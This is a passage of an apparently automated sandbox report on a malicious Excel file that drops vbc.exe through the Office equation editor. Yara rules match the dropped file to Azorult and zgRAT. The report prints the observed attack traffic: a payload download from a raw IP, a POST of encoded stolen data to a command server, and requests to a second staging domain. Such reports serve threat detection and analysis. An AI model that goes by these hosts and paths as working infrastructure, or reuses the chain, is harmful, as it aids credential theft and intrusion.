00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.663004977.000000000428C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/
              Source: vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-de/
              Source: vbc.exe, 00000009.00000002.675417727.00000000004F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp$
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.p
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
              Source: vbc.exe, 00000009.00000002.676388319.0000000003EB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php
              Source: vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
              Source: vbc.exe, vbc.exe, 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.606388990.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.606099043.00000000023AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670889097.0000000003ED8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657260286.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.657360630.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658728603.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658927667.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656593935.00000000042B8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.656670065.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: vbc.exe, 00000009.00000002.677445164.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.675447446.0000000000528000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676901801.0000000004850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
              Source: unknownHTTP traffic detected: POST /azo01/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: clamprite.gaContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3a 70 9d 3a 70 9d 37 70 9d 37 13 8b 30 65 8b 30 60 8b 30 6d 8b 31 11 8b 30 6d ea 26 66 9a 45 70 9d 36 10 8b 30 67 ed Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp:p:p7p70e0`0m10m&fEp60g
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C52E2F1C.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: etapackbg.com
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,9_2_00418688
              Source: global trafficHTTP traffic detected: GET /22/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.218.119Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /css/Sngggz.png HTTP/1.1Host: etapackbg.comConnection: Keep-Alive

              E-Banking Fraud

              barindex
              Yara detected gzRat
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
              Source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.vbc.exe.4438750.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 9.2.vbc.exe.44c5e8e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 9.2.vbc.exe.445a73d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
              Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
              Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
              Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above ) "T" 0 0 32 0 0 33 34 35 0 0 36 ,
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 4.2.vbc.exe.3483f30.6.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 9.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 9.2.vbc.exe.4438750.7.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 9.2.vbc.exe.44c5e8e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 9.2.vbc.exe.445a73d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
